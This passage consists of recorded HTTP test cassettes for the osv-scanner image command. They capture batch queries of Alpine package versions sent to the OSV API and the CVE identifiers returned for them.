cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_ExplicitExtractors_WithDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2031 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/add_extractors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 364 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", 
"modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "364" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out 
url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 url: https://api.osv.dev/v1/querybatch method: 
POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 
proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_ExplicitExtractors_WithoutDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 146 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 241 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "241" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_HtmlFile.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.10.6-r0" }, { 
"package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 9123 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-30139", "modified": "2025-12-03T22:50:14.655691Z" }, { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": 
"ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": 
"2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": 
"ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { 
"id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { 
"id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" } ] } ] } headers: Content-Length: - "9123" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_OCIImage.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { 
"package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 9123 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-30139", "modified": "2025-12-03T22:50:14.655691Z" }, { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": 
"2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { 
"id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": 